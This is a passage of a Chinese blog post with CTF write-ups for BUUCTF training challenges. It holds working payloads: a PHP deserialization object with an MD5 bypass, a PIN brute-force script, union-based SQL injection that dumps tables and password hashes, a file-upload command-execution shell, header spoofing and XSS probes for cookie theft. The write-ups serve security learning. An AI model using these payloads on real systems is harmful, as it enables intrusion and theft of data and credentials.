</span><span style=color:#e6db74> * Time: 8:04 PM
</span><span style=color:#e6db74> */</span>

<span style=color:#a6e22e>highlight_file</span>(<span style=color:#66d9ef>__FILE__</span>);

<span style=color:#66d9ef>class</span> <span style=color:#a6e22e>BUU</span> {
   <span style=color:#66d9ef>public</span> $correct <span style=color:#f92672>=</span> <span style=color:#e6db74>&#34;&#34;</span>;
   <span style=color:#66d9ef>public</span> $input <span style=color:#f92672>=</span> <span style=color:#e6db74>&#34;&#34;</span>;

   <span style=color:#66d9ef>public</span> <span style=color:#66d9ef>function</span> __destruct() {
       <span style=color:#66d9ef>try</span> {
           $this<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>correct</span> <span style=color:#f92672>=</span> <span style=color:#a6e22e>base64_encode</span>(<span style=color:#a6e22e>uniqid</span>());
           <span style=color:#66d9ef>if</span>($this<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>correct</span> <span style=color:#f92672>===</span> $this<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>input</span>) {
               <span style=color:#66d9ef>echo</span> <span style=color:#a6e22e>file_get_contents</span>(<span style=color:#e6db74>&#34;/flag&#34;</span>);
           }
       } <span style=color:#66d9ef>catch</span> (<span style=color:#a6e22e>Exception</span> $e) {
       }
   }
}

<span style=color:#66d9ef>if</span>($_GET[<span style=color:#e6db74>&#39;pleaseget&#39;</span>] <span style=color:#f92672>===</span> <span style=color:#e6db74>&#39;1&#39;</span>) {
    <span style=color:#66d9ef>if</span>($_POST[<span style=color:#e6db74>&#39;pleasepost&#39;</span>] <span style=color:#f92672>===</span> <span style=color:#e6db74>&#39;2&#39;</span>) {
        <span style=color:#66d9ef>if</span>(<span style=color:#a6e22e>md5</span>($_POST[<span style=color:#e6db74>&#39;md51&#39;</span>]) <span style=color:#f92672>==</span> <span style=color:#a6e22e>md5</span>($_POST[<span style=color:#e6db74>&#39;md52&#39;</span>]) <span style=color:#f92672>&amp;&amp;</span> $_POST[<span style=color:#e6db74>&#39;md51&#39;</span>] <span style=color:#f92672>!=</span> $_POST[<span style=color:#e6db74>&#39;md52&#39;</span>]) {
            <span style=color:#a6e22e>unserialize</span>($_POST[<span style=color:#e6db74>&#39;obj&#39;</span>]);
        }
    }
}
</code></pre></div><p>代码审计，题目的考察点在于<code>MD5</code>绕过和反序列化，我们所需提交的内容如下：</p>
<pre tabindex=0><code>GET提交:	pleaseget=1
POST提交第一部分:	pleasepost=2&amp;md51=0&amp;md52=&quot;a&quot;
POST提交第二部分:	obj，一个BUU类的实例化对象，属性值在经过$this-&gt;correct=base64_encode(uniqid());之后依然全等，可以通过把变化的$correct属性引用赋值给$input

// 解析
__destruct():	对象所有引用都被删除或当对象被显示销毁时执行
uniqid():	基于以微秒的当前时间生成一个唯一ID
传值赋值:	变量默认为传值赋值，即当一个表达式的值赋予一个变量时，整个原始表达式的值被赋到目标变量。如把变量a的值赋给变量b，改变a的值不会影响b的值，反之亦然
引用赋值:	新变量会简单引用(也可理解为指向)原始变量，改动新变量值的同时也会改变原始变量的值，反之亦然
</code></pre><p>接下来我们就编写代码构造<code>payload</code>：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=color:#f92672>&lt;?</span><span style=color:#a6e22e>php</span>
<span style=color:#66d9ef>class</span> <span style=color:#a6e22e>BUU</span>{
    <span style=color:#66d9ef>public</span> $correct <span style=color:#f92672>=</span> <span style=color:#e6db74>&#34;&#34;</span>;
    <span style=color:#66d9ef>public</span> $input <span style=color:#f92672>=</span> <span style=color:#e6db74>&#34;&#34;</span>;
    
    <span style=color:#66d9ef>public</span> <span style=color:#66d9ef>function</span> __destruct() {
        <span style=color:#66d9ef>try</span> {
            $this<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>correct</span> <span style=color:#f92672>=</span> <span style=color:#a6e22e>base64_encode</span>(<span style=color:#a6e22e>uniqid</span>());
            <span style=color:#66d9ef>if</span> ($this<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>correct</span> <span style=color:#f92672>===</span> $this<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>input</span>) {
                <span style=color:#66d9ef>echo</span> <span style=color:#a6e22e>file_get_contents</span>(<span style=color:#e6db74>&#34;/flag&#34;</span>);
            }
        } <span style=color:#66d9ef>catch</span> (<span style=color:#a6e22e>Exception</span> $e){
        }
    }
}
$res <span style=color:#f92672>=</span> <span style=color:#66d9ef>new</span> <span style=color:#a6e22e>BUU</span>();
$res<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>input</span> <span style=color:#f92672>=</span> <span style=color:#f92672>&amp;</span>$res<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>correct</span>;	<span style=color:#75715e>// 传入一个引用
</span><span style=color:#75715e></span><span style=color:#66d9ef>echo</span> <span style=color:#a6e22e>serialize</span>($res);
<span style=color:#75715e>?&gt;</span><span style=color:#960050;background-color:#1e0010>
</span></code></pre></div><p>执行结果:</p>
<pre tabindex=0><code>O:3:&quot;BUU&quot;:2:{s:7:&quot;correct&quot;;s:0:&quot;&quot;;s:5:&quot;input&quot;;R:2;}
</code></pre><p>传递参数如下：</p>
<pre tabindex=0><code>GET:
pleaseget=1

POST:
pleasepost=2
&amp;md51[]=1
&amp;md52[]=2
&amp;obj=O:3:&quot;BUU&quot;:2:{s:7:&quot;correct&quot;;s:0:&quot;&quot;;s:5:&quot;input&quot;;R:2;}
</code></pre><h2 id=buu-brute-1>BUU BRUTE 1<a hidden class=anchor aria-hidden=true href=#buu-brute-1>#</a></h2>
<p>是一个登录框，尝试<code>admin/admin</code>，页面回显<code>密码错误，为四位数字。</code>，直接上<code>bp</code>爆破。</p>
<p>步骤一</p>
<p>抓取点击提交按钮时的数据包并发送至<code>Intruder</code>模块。</p>
<p>步骤二</p>
<p>在<code>Inturder</code>模块中将<code>password</code>设置为<code>payload</code>，然后选择数字字典。</p>
<p>步骤三</p>
<p>可将爆破间隔时间调高避免被封。</p>
<p>也可用以下<code>python</code>脚本：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=color:#f92672>import</span> requests
<span style=color:#f92672>import</span> time

url <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;http://&lt;ip&gt;:&lt;port&gt;/?username=admin&amp;password=&#39;</span>

<span style=color:#66d9ef>for</span> i <span style=color:#f92672>in</span> range(<span style=color:#ae81ff>6000</span>, <span style=color:#ae81ff>6499</span>):
    res <span style=color:#f92672>=</span> requests<span style=color:#f92672>.</span>get(url<span style=color:#f92672>+</span>str(i))
    time<span style=color:#f92672>.</span>sleep(<span style=color:#ae81ff>0.1</span>)

    <span style=color:#66d9ef>if</span> res<span style=color:#f92672>.</span>text <span style=color:#f92672>!=</span> <span style=color:#e6db74>&#39;密码错误，为四位数字。&#39;</span>:
        print(res<span style=color:#f92672>.</span>text)
        <span style=color:#66d9ef>break</span>
</code></pre></div><h2 id=sqli-labs>sqli-labs<a hidden class=anchor aria-hidden=true href=#sqli-labs>#</a></h2>
<p><code>SQL</code>注入，传入参数<code>id=1</code>和<code>id=-1</code>，页面回显正常，传入<code>id=1'</code>，页面报错，判断为字符型注入。使用联合查询看看有几列数据：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span><span style=color:#e6db74>&#39;union select 1,2,3--+
</span></code></pre></div><p>经过尝试后发现总共有三列数据，查看当前库名：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span><span style=color:#e6db74>&#39;union select 1,database(),3--+
</span></code></pre></div><p>爆库名：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span><span style=color:#e6db74>&#39;union select 1,database(),group_concat(schema_name) from information_schema.schemata--+
</span><span style=color:#e6db74>
</span><span style=color:#e6db74>// 结果如下
</span><span style=color:#e6db74>Your Login name:security
</span><span style=color:#e6db74>Your Password:ctftraining,information_schema,mysql,performance_schema,security,test
</span></code></pre></div><p>爆表名：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span><span style=color:#e6db74>&#39;union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=&#39;</span>ctftraining<span style=color:#e6db74>&#39;--+
</span><span style=color:#e6db74>
</span><span style=color:#e6db74>// 结果如下
</span><span style=color:#e6db74>Your Login name:security
</span><span style=color:#e6db74>Your Password:flag,news,users
</span></code></pre></div><p>爆列名：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span><span style=color:#e6db74>&#39;union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=&#39;</span>ctftraining<span style=color:#e6db74>&#39; and table_name=&#39;</span>flag<span style=color:#e6db74>&#39;--+
</span><span style=color:#e6db74>
</span><span style=color:#e6db74>// 结果如下
</span><span style=color:#e6db74>Your Login name:security
</span><span style=color:#e6db74>Your Password:flag
</span></code></pre></div><p>爆字段：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span><span style=color:#e6db74>&#39;union select 1,database(),group_concat(flag) from ctftraining.flag--+
</span></code></pre></div><h2 id=buu-sql-course-1>BUU SQL COURSE 1<a hidden class=anchor aria-hidden=true href=#buu-sql-course-1>#</a></h2>
<p>一个简单的新闻网，尝试在登录框进行SQL注入，发现都被过滤了。本来打算在<code>测试新闻</code>页面进行注入的，可是没找到注入点，发现登录框注入行不通后，打开网络控制台，切换到<code>Network</code>模块，看看页面都加载了什么资源，发现有一个<code>content_detail.php</code>页面：</p>
<pre tabindex=0><code>&lt;domain&gt;:&lt;port&gt;/backend/content_detail.php?id=1
</code></pre><p>进行注入类型判断：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=</span><span style=color:#ae81ff>1</span> <span style=color:#66d9ef>and</span> <span style=color:#ae81ff>1</span><span style=color:#f92672>=</span><span style=color:#ae81ff>1</span><span style=color:#75715e>--+	// 页面回显正常
</span><span style=color:#75715e></span><span style=color:#f92672>?</span>id<span style=color:#f92672>=</span><span style=color:#ae81ff>1</span> <span style=color:#66d9ef>and</span> <span style=color:#ae81ff>1</span><span style=color:#f92672>=</span><span style=color:#ae81ff>2</span><span style=color:#75715e>--+	// 页面回显错误
</span></code></pre></div><p>判断为数字型注入。</p>
<p>使用联合查询查看有几列数据：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span> <span style=color:#66d9ef>union</span> <span style=color:#66d9ef>select</span> <span style=color:#ae81ff>1</span>,<span style=color:#ae81ff>2</span><span style=color:#75715e>--+
</span></code></pre></div><p>一共有两列数据，均为回显点。</p>
<p>爆库：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span> <span style=color:#66d9ef>union</span> <span style=color:#66d9ef>select</span> <span style=color:#ae81ff>1</span>,group_concat(<span style=color:#66d9ef>schema_name</span>) <span style=color:#66d9ef>from</span> information_schema.schemata

<span style=color:#f92672>//</span> <span style=color:#960050;background-color:#1e0010>结果</span>
<span style=color:#960050;background-color:#1e0010>{</span><span style=color:#e6db74>&#34;title&#34;</span>:<span style=color:#e6db74>&#34;1&#34;</span>,<span style=color:#e6db74>&#34;content&#34;</span>:<span style=color:#e6db74>&#34;information_schema,ctftraining,mysql,performance_schema,test,news&#34;</span><span style=color:#960050;background-color:#1e0010>}</span>
</code></pre></div><p>爆表：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span> <span style=color:#66d9ef>union</span> <span style=color:#66d9ef>select</span> <span style=color:#ae81ff>1</span>,group_concat(<span style=color:#66d9ef>table_name</span>) <span style=color:#66d9ef>from</span> information_schema.tables <span style=color:#66d9ef>where</span> table_schema<span style=color:#f92672>=</span><span style=color:#e6db74>&#39;ctftraining&#39;</span><span style=color:#75715e>--+
</span><span style=color:#75715e></span>
<span style=color:#f92672>//</span> <span style=color:#960050;background-color:#1e0010>结果</span>
<span style=color:#960050;background-color:#1e0010>{</span><span style=color:#e6db74>&#34;title&#34;</span>:<span style=color:#e6db74>&#34;1&#34;</span>,<span style=color:#e6db74>&#34;content&#34;</span>:<span style=color:#e6db74>&#34;FLAG_TABLE,news,users&#34;</span><span style=color:#960050;background-color:#1e0010>}</span>
</code></pre></div><p>爆列：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span> <span style=color:#66d9ef>union</span> <span style=color:#66d9ef>select</span> <span style=color:#ae81ff>1</span>,group_concat(<span style=color:#66d9ef>column_name</span>) <span style=color:#66d9ef>from</span> information_schema.columns <span style=color:#66d9ef>where</span> <span style=color:#66d9ef>table_name</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#39;users&#39;</span><span style=color:#75715e>--+
</span><span style=color:#75715e></span>
<span style=color:#f92672>//</span> <span style=color:#960050;background-color:#1e0010>结果</span>
<span style=color:#960050;background-color:#1e0010>{</span><span style=color:#e6db74>&#34;title&#34;</span>:<span style=color:#e6db74>&#34;1&#34;</span>,<span style=color:#e6db74>&#34;content&#34;</span>:<span style=color:#e6db74>&#34;id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS&#34;</span><span style=color:#960050;background-color:#1e0010>}</span>
</code></pre></div><p>爆字段：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sql data-lang=sql><span style=color:#f92672>//</span> username字段
<span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span> <span style=color:#66d9ef>union</span> <span style=color:#66d9ef>select</span> <span style=color:#ae81ff>1</span>,group_concat(username) <span style=color:#66d9ef>from</span> ctftraining.users<span style=color:#75715e>--+
</span><span style=color:#75715e></span><span style=color:#960050;background-color:#1e0010>{</span><span style=color:#e6db74>&#34;title&#34;</span>:<span style=color:#e6db74>&#34;1&#34;</span>,<span style=color:#e6db74>&#34;content&#34;</span>:<span style=color:#e6db74>&#34;admin,guest,virink&#34;</span><span style=color:#960050;background-color:#1e0010>}</span>

<span style=color:#f92672>//</span> password字段
<span style=color:#f92672>?</span>id<span style=color:#f92672>=-</span><span style=color:#ae81ff>1</span> <span style=color:#66d9ef>union</span> <span style=color:#66d9ef>select</span> <span style=color:#ae81ff>1</span>,group_concat(password) <span style=color:#66d9ef>from</span> ctftraining.users<span style=color:#75715e>--+
</span><span style=color:#75715e></span><span style=color:#960050;background-color:#1e0010>{</span><span style=color:#e6db74>&#34;title&#34;</span>:<span style=color:#e6db74>&#34;1&#34;</span>,<span style=color:#e6db74>&#34;content&#34;</span>:<span style=color:#e6db74>&#34;21232f297a57a5a743894a0e4a801fc3,084e0343a0486ff05530df6c705c8bb4,a4346e75cc1dd161a8d57f3b2d5d82d0&#34;</span><span style=color:#960050;background-color:#1e0010>}</span>
</code></pre></div><p>然后发现密码不对，再尝试爆破<code>news</code>表，步骤如上。</p>
<h2 id=buu-upload-course-1>BUU UPLOAD COURSE 1<a hidden class=anchor aria-hidden=true href=#buu-upload-course-1>#</a></h2>
<p>页面如下：</p>
<p><img loading=lazy src=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/Screen%20Shot%202021-08-22%20at%2019.11.24_2021%2008%2022%2019%2011%20.png alt="Screen Shot 2021-08-22 at 19.11.24">
</p>
<p>查看页面元素：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>&lt;<span style=color:#f92672>form</span> <span style=color:#a6e22e>action</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;index.php?file=upload.php&#34;</span> <span style=color:#a6e22e>method</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;post&#34;</span> <span style=color:#a6e22e>enctype</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;multipart/form-data&#34;</span>&gt;
        &lt;<span style=color:#f92672>input</span> <span style=color:#a6e22e>type</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;file&#34;</span> <span style=color:#a6e22e>name</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;upload_file&#34;</span>&gt;
        &lt;<span style=color:#f92672>input</span> <span style=color:#a6e22e>type</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;submit&#34;</span> <span style=color:#a6e22e>value</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;上传&#34;</span>&gt;
&lt;/<span style=color:#f92672>form</span>&gt;
</code></pre></div><p>发现此处通过<code>file</code>参数调用文件，检查一下是否存在文件包含漏洞，上传一个<code>phpinfo</code>看看：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=color:#f92672>&lt;?</span><span style=color:#a6e22e>php</span> <span style=color:#a6e22e>phpinfo</span>();<span style=color:#75715e>?&gt;</span><span style=color:#960050;background-color:#1e0010>
</span></code></pre></div><p>上传成功后会随机返回一个地址，而且文件后缀被更改为<code>.jpg</code>，我们查看命令是否能被解析：</p>
<pre tabindex=0><code>?file=uploads/&lt;random-value&gt;.jpg
</code></pre><p>成功回显<code>phpinfo</code>页面，按照划水经验来讲，<code>flag</code>应该在根目录，在<code>bp</code>中将文件内容更改如下：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=color:#f92672>&lt;?</span><span style=color:#a6e22e>php</span> <span style=color:#a6e22e>system</span>(<span style=color:#e6db74>&#34;cat /flag&#34;</span>);<span style=color:#75715e>?&gt;</span><span style=color:#960050;background-color:#1e0010>
</span></code></pre></div><p>发包，访问，成功获得<code>flag</code>。</p>
<h2 id=buu-burp-course-1>BUU BURP COURSE 1<a hidden class=anchor aria-hidden=true href=#buu-burp-course-1>#</a></h2>
<p>访问页面，显示<code>只能本地访问</code>，分别尝试构造了<code>X-Forwarded-For</code>、<code>X-Originating-IP</code>、<code>X-Remote-IP</code>、<code>X-Remote-Addr</code>四个字段，均未成功&mldr;</p>
<p>查了资料发现还有个<code>X-Real-IP</code>，在<code>bp</code>中添加请求头，访问成功，是一个登录页面，将<code>URL</code>复制，粘贴到浏览器访问：</p>
<p><img loading=lazy src=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/Screen%20Shot%202021-08-22%20at%2020.37.10_2021%2008%2022%2020%2039%20.png alt="Screen Shot 2021-08-22 at 20.37.10">
</p>
<p>点击登录后还是显示<code>只能本地访问</code>，抓取点击登录的包，放在<code>bp</code>里面添加请求头，查看响应包即可。</p>
<blockquote>
<p>X-Forwarded-For：记录代理信息，每经过一次代理（匿名代理除外），代理服务器都会把这次请求的来源IP追加在X-Forwarded-For中并且用逗号分隔。</p>
<p>X-Real-IP：一般只记录真实发出请求的客户端IP。</p>
</blockquote>
<h2 id=buu-xss-course-1>BUU XSS COURSE 1<a hidden class=anchor aria-hidden=true href=#buu-xss-course-1>#</a></h2>
<p>一个树洞系统，分为留言和登录两个模块，猜测需要通过<code>XSS</code>获取管理员<code>Cookie</code>进行登录。</p>
<p>先检验一下过滤情况，在留言处输入如下语句：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>&lt;<span style=color:#f92672>scrIpT</span>&gt;<span style=color:#a6e22e>alert</span>(<span style=color:#e6db74>/xss/</span>)&lt;/<span style=color:#f92672>scrIpT</span>&gt;
</code></pre></div><p>提交后会回显一个随机地址，访问发现什么也没有，打开控制台查看页面元素：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>&lt;<span style=color:#f92672>span</span> <span style=color:#a6e22e>data-v-1a9a378f</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;&#34;</span>&gt;
  &lt;<span style=color:#f92672>script</span>&gt;<span style=color:#a6e22e>alert</span>(<span style=color:#e6db74>/xss/</span>)&lt;/<span style=color:#f92672>script</span>&gt;
&lt;/<span style=color:#f92672>span</span>&gt;
</code></pre></div><p>语句被放到了<code>span</code>标签中，接下来看看能否使用<code>img</code>标签：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>&lt;<span style=color:#f92672>img</span> <span style=color:#a6e22e>src</span><span style=color:#f92672>=</span><span style=color:#e6db74>#</span> <span style=color:#a6e22e>onerror</span><span style=color:#f92672>=</span><span style=color:#e6db74>alert(xss)/</span>&gt;
</code></pre></div><p>页面无法加载图片，标签能够正常使用，页面元素：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>&lt;<span style=color:#f92672>span</span> <span style=color:#a6e22e>data-v-1a9a378f</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;&#34;</span>&gt;
  &lt;<span style=color:#f92672>img</span> <span style=color:#a6e22e>src</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;#&#34;</span> <span style=color:#a6e22e>onerror</span><span style=color:#f92672>=</span><span style=color:#e6db74>&#34;alert(xss)/&#34;</span>&gt;
&lt;/<span style=color:#f92672>span</span>&gt;
</code></pre></div><p>接下来我们就需要构造一个存储型<code>XSS</code>，获取管理员<code>Cookie</code>，登录得到<code>flag</code>。那么现在还缺少一个相应的接收平台，这里使用<a href=http://xss.buuoj.cn/index.php>XSS Platform (buuoj.cn)</a>进行构造。</p>
<p>注册登录后选择创建项目。</p>
<p>平台暂时使用不了……</p>
<h2 id=pikachu>PikaChu<a hidden class=anchor aria-hidden=true href=#pikachu>#</a></h2>
<blockquote>
<p>本文链接：<a href=https://oopsdc.tk/post/buuctf/>BUUCTF | Atmet</a></p>
<p>文章许可：本文采用<a href=https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh>CC BY-NC-SA 4.0</a>许可协议，转载请注明出处。</p>
</blockquote>
</div>
<footer class=post-footer>
<ul class=post-tags>
<li><a href=https://examplesite.com/tags/ctf/>CTF</a></li>
</ul>
<nav class=paginav>
<a class=prev href=https://examplesite.com/post/md5%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87/>
<span class=title>« Prev Page</span>
<br>
<span>MD5()函数绕过</span>
</a>
<a class=next href=https://examplesite.com/post/attck%E5%AE%9E%E6%88%98%E4%B8%80/>
<span class=title>Next Page »</span>
<br>
<span>ATT&CK实战一</span>
</a>
</nav>
<div class=share-buttons>
<a target=_blank rel="noopener noreferrer" aria-label="share BUUCTF on twitter" href="https://twitter.com/intent/tweet/?text=BUUCTF&url=https%3a%2f%2fexamplesite.com%2fpost%2fbuuctf%2f&hashtags=CTF"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H62.554c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892zM195.519 424.544c135.939.0 210.268-112.643 210.268-210.268.0-3.218.0-6.437-.153-9.502 14.406-10.421 26.973-23.448 36.935-38.314-13.18 5.824-27.433 9.809-42.452 11.648 15.326-9.196 26.973-23.602 32.49-40.92-14.252 8.429-30.038 14.56-46.896 17.931-13.487-14.406-32.644-23.295-53.946-23.295-40.767.0-73.87 33.104-73.87 73.87.0 5.824.613 11.494 1.992 16.858-61.456-3.065-115.862-32.49-152.337-77.241-6.284 10.881-9.962 23.601-9.962 37.088.0 25.594 13.027 48.276 32.95 61.456-12.107-.307-23.448-3.678-33.41-9.196v.92c0 35.862 25.441 65.594 59.311 72.49-6.13 1.686-12.72 2.606-19.464 2.606-4.751.0-9.348-.46-13.946-1.38 9.349 29.426 36.628 50.728 68.965 51.341-25.287 19.771-57.164 31.571-91.8 31.571-5.977.0-11.801-.306-17.625-1.073 32.337 21.15 71.264 33.41 112.95 33.41z"/></svg>
</a>
<a target=_blank rel="noopener noreferrer" aria-label="share BUUCTF on linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url=https%3a%2f%2fexamplesite.com%2fpost%2fbuuctf%2f&title=BUUCTF&summary=BUUCTF&source=https%3a%2f%2fexamplesite.com%2fpost%2fbuuctf%2f"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H62.554c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892zM160.461 423.278V197.561h-75.04v225.717h75.04zm270.539.0V293.839c0-69.333-37.018-101.586-86.381-101.586-39.804.0-57.634 21.891-67.617 37.266v-31.958h-75.021c.995 21.181.0 225.717.0 225.717h75.02V297.222c0-6.748.486-13.492 2.474-18.315 5.414-13.475 17.767-27.434 38.494-27.434 27.135.0 38.007 20.707 38.007 51.037v120.768H431zM123.448 88.722C97.774 88.722 81 105.601 81 127.724c0 21.658 16.264 39.002 41.455 39.002h.484c26.165.0 42.452-17.344 42.452-39.002-.485-22.092-16.241-38.954-41.943-39.002z"/></svg>
</a>
<a target=_blank rel="noopener noreferrer" aria-label="share BUUCTF on reddit" href="https://reddit.com/submit?url=https%3a%2f%2fexamplesite.com%2fpost%2fbuuctf%2f&title=BUUCTF"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H62.554c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892zM446 265.638c0-22.964-18.616-41.58-41.58-41.58-11.211.0-21.361 4.457-28.841 11.666-28.424-20.508-67.586-33.757-111.204-35.278l18.941-89.121 61.884 13.157c.756 15.734 13.642 28.29 29.56 28.29 16.407.0 29.706-13.299 29.706-29.701.0-16.403-13.299-29.702-29.706-29.702-11.666.0-21.657 6.792-26.515 16.578l-69.105-14.69c-1.922-.418-3.939-.042-5.585 1.036-1.658 1.073-2.811 2.761-3.224 4.686l-21.152 99.438c-44.258 1.228-84.046 14.494-112.837 35.232-7.468-7.164-17.589-11.591-28.757-11.591-22.965.0-41.585 18.616-41.585 41.58.0 16.896 10.095 31.41 24.568 37.918-.639 4.135-.99 8.328-.99 12.576.0 63.977 74.469 115.836 166.33 115.836s166.334-51.859 166.334-115.836c0-4.218-.347-8.387-.977-12.493 14.564-6.47 24.735-21.034 24.735-38.001zM326.526 373.831c-20.27 20.241-59.115 21.816-70.534 21.816-11.428.0-50.277-1.575-70.522-21.82-3.007-3.008-3.007-7.882.0-10.889 3.003-2.999 7.882-3.003 10.885.0 12.777 12.781 40.11 17.317 59.637 17.317 19.522.0 46.86-4.536 59.657-17.321 3.016-2.999 7.886-2.995 10.885.008 3.008 3.011 3.003 7.882-.008 10.889zm-5.23-48.781c-16.373.0-29.701-13.324-29.701-29.698.0-16.381 13.328-29.714 29.701-29.714 16.378.0 29.706 13.333 29.706 29.714.0 16.374-13.328 29.698-29.706 29.698zM160.91 295.348c0-16.381 13.328-29.71 29.714-29.71 16.369.0 29.689 13.329 29.689 29.71.0 16.373-13.32 29.693-29.689 29.693-16.386.0-29.714-13.32-29.714-29.693z"/></svg>
</a>
